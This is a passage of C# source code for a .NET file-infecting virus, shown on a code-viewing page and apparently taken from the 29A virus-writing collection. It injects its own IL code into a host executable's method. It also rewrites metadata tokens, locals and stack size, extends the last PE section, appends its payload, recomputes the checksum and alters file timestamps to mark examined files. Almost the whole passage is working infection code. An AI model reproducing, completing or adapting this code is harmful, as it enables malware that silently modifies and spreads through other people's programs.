📄 29a-7.002
字号:
/* fix up host token references */
/* variable 25: number of our locals */
stringsind = 0x19626772;
do
{
if (((opcode = blobnew[strbase]) == 0x1d)
|| ((UInt32) (opcode - 0x0f) <= 3)
)
{
++strbase;
if ((UInt32) (opcode - 0x11) <= 1)
{
blobnew[strbase] += (Byte) (typerefs << 2);
}
}
++strbase;
}
while (--stringsind != 0);
/* find first method using selected StandAloneSig */
do
{
rva = BitConverter.ToInt32(rootnew, methodoff += 0x14);
do {} while ((raw = BitConverter.ToInt32(sect, (sectsize -= 0x28) + 0x0c)) > rva);
fs.Seek((dataoff = rva - raw + BitConverter.ToInt32(sect, sectsize + 0x14)), 0); /* 0 == SeekOrigin.Begin */
fs.Read(buff, 0xa0, 0x0c); /* assuming 3 dwords for the header, but actual count is in the header (>> 0x0c, & 0x0f) */
}
while (((buff[0xa0] & 7) == 3) /* 3 == CorILMethod_FatFormat (only Fat type supports locals) */
&& ((BitConverter.ToInt32(buff, 0xa8) & 0x00ffffff) != randsig)
);
/* check that host contains no exception handling information */
if ((buff[0xa0] & 8) == 0) /* 8 == CORILMETHOD_MORESECTS */
{
/* store new host method RVA */
Marshal.WriteInt32(rootnew, methodoff, (rva = BitConverter.ToInt32(buff, 4)) + (raw = BitConverter.ToInt32(buff, 8)));
/* read host method */
fs.Seek(-0x0c, SeekOrigin.Current);
baseind = BitConverter.ToInt32(buff, 0xa4) - 1;
fs.Read(rootold = new Byte[(UInt32) (baseind + 0x0c)], 0, baseind + 0x0c);
/* store new host method stack size */
/* variable 27: size of our stack */
Marshal.WriteInt16(rootold, 2, (Int16) (BitConverter.ToInt16(rootold, 2) + 0x1b626772));
/* store new host method size and StandAloneSig index */
/* variable 2: size of our code */
Marshal.WriteInt64(rootold, 4, ((Int64) (standalonesigs + 0x11000001) << 0x20) + (sectsize = baseind + 0x02626772));
/* variable 28: RVA in our code of variable 3 */
Marshal.WriteInt32(codecopy, 0x1c626772, dataoff = rva + raw + baseind + 0x0c);
/* variable 29: RVA in our code of variable 4 */
Marshal.WriteInt32(codecopy, 0x1d626772, (strbase = (dataoff + (sectcopy = sectsize - (sigoff = rootold.GetLength(0)) + 0x0c) + 3) & -4) + stroff);
/* variable 30: RVA in our code of variable 10 */
Marshal.WriteInt32(codecopy, 0x1e626772, strbase + trefoff);
/* variable 31: RVA in our code of variable 12 */
Marshal.WriteInt32(codecopy, 0x1f626772, strbase + mrefoff);
/* variable 32: RVA in our code of variable 19 */
Marshal.WriteInt32(codecopy, 0x20626772, strbase + (baseind = siglen = rootnew.GetLength(0)) + bloboff);
/* variable 33: previous host locals count */
Int32 localsdelta = standalonesigs - 0x21626772;
/* variable 34: RVA in our code of variable 33 */
Marshal.WriteInt32(codecopy, 0x22626772, standalonesigs);
/* parse our code */
mrefdelta >>= 3;
blobind = 0;
do
{
if (((opcode = codecopy[blobind++]) == 0x1f) /* ldc.i4.s */
|| ((UInt32) (opcode - 0x2b) <= 0x0c) /* bcond.s */
|| (opcode == 0xde) /* leave.s */
)
{
++blobind;
}
else if ((opcode == 0x20) /* ldc.i4 */
|| (opcode == 0x22) /* ldc.r4 */
|| ((UInt32) (opcode - 0x38) <= 0x0c) /* bcond */
|| (opcode == 0xdd) /* leave */
)
{
blobind += 4;
}
else if ((opcode == 0x21) /* ldc.i8 */
|| (opcode == 0x23) /* ldc.r8 */
)
{
blobind += 8;
}
else if (((UInt32) (opcode - 0x27) <= 2) /* jmp, call */
|| ((UInt32) (opcode - 0x6f) <= 6) /* calli, callvirt, cpobj, ldobj, ldstr, newobj, castclass, isinst */
|| (opcode == 0x79) /* unbox */
|| ((UInt32) (opcode - 0x7b) <= 6) /* ldfld, ldflda, stfld, ldsfld, ldsflda, stsfld, stobj */
|| ((UInt32) (opcode - 0x8c) <= 1) /* box, newarr */
|| (opcode == 0x8f) /* ldelema */
|| (opcode == 0xc2) /* refanyval */
|| (opcode == 0xc6) /* mkrefany */
|| (opcode == 0xd0) /* ldtoken */
)
{
Marshal.WriteInt32(codecopy, blobind, BitConverter.ToInt32(codecopy, blobind) + mrefdelta);
blobind += 4;
}
else if (opcode == 0x45) /* switch */
{
blobind += (BitConverter.ToInt32(codecopy, blobind) + 1) * 4;
}
else if (opcode == 0xfe) /* prefix1 */
{
if ((opcode = codecopy[blobind++]) == 0x12) /* unaligned */
{
++blobind;
}
else if (((UInt32) (opcode - 0x06) <= 1) /* ldftn, ldvirtftn */
|| (opcode == 0x15) /* initobj */
|| (opcode == 0x1c) /* sizeof */
)
{
Marshal.WriteInt32(codecopy, blobind, BitConverter.ToInt32(codecopy, blobind) + mrefdelta);
blobind += 4;
}
else if ((UInt32) (opcode - 0x09) <= 5) /* ldarg, ldarga, starg, ldloc, ldloca, stloc */
{
Marshal.WriteInt16(codecopy, blobind, (Int16) (BitConverter.ToInt16(codecopy, blobind) + localsdelta));
blobind += 2;
}
}
/* variable 2: size of our code */
}
while (blobind != 0x02626772);
/* update host Metadata root RVA and size */
Marshal.WriteInt64(buff, 0xa0, ((Int64) (baseind += (blobind = blobnew.GetLength(0))) << 0x20) + (rva + raw + (blobtotal = (sectsize + 0x0f) & -4)));
fs.Seek(rootptroff, 0); /* 0 == SeekOrigin.Begin */
fs.Write(buff, 0xa0, 8);
/* update host last section virtual size */
Marshal.WriteInt32(buff, 0, blobtotal += raw + baseind);
/* update host last section raw size */
baseind = BitConverter.ToInt32(buff, 0x3c) - 1;
Marshal.WriteInt32(buff, 8, blobtotal = (blobtotal + baseind) & ~baseind);
fs.Seek(lastsect, 0); /* 0 == SeekOrigin.Begin */
fs.Write(buff, 0, 0x0c);
/* update host image size */
baseind = BitConverter.ToInt32(buff, 0x38) - 1;
Marshal.WriteInt32(buff, 0x50, (blobtotal + rva + baseind) & ~baseind);
raw = BitConverter.ToInt32(buff, 0x58);
Marshal.WriteInt32(buff, 0x58, 0);
fs.Seek(lfanew + 0x50, 0); /* 0 == SeekOrigin.Begin */
fs.Write(buff, 0x50, 0x0c);
/* append our data */
fs.Seek(0, SeekOrigin.End);
fs.Write(rootold, 0, sigoff);
fs.Write(codecopy, 0, sectcopy);
fs.Seek(((Int32) (fs.Seek(0, SeekOrigin.Current)) + 3) & -4, 0); /* 0 == SeekOrigin.Begin */
fs.Write(rootnew, 0, siglen);
fs.Write(blobnew, 0, blobind);
fs.SetLength(blobtotal += BitConverter.ToInt32(buff, 0x0c));
/* recalculate checksum, if required */
if (raw != 0)
{
fs.Seek(0, 0); /* 0 == SeekOrigin.Begin */
raw = 0;
baseind = blobtotal;
do
{
fs.Read(buff, 0, 2);
raw = (Int16) (raw) + BitConverter.ToInt16(buff, 0) + (raw >> 0x10);
}
while ((baseind -= 2) != 0);
Marshal.WriteInt32(buff, 0, blobtotal + (Int16) (raw) + (raw >> 0x10));
fs.Seek(lfanew + 0x58, 0); /* 0 == SeekOrigin.Begin */
fs.Write(buff, 0, 4);
}
}
}
}
}
}
}
}
}
}
}
}
fs.Close();
/* mark every file that was examined, even if not infected
last write time is used because is kept on file copy
*/
File.SetLastWriteTime(filename, lastwrite.AddSeconds(-lastwrite.Second));
File.SetAttributes(filename, attr);
}
}
}
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -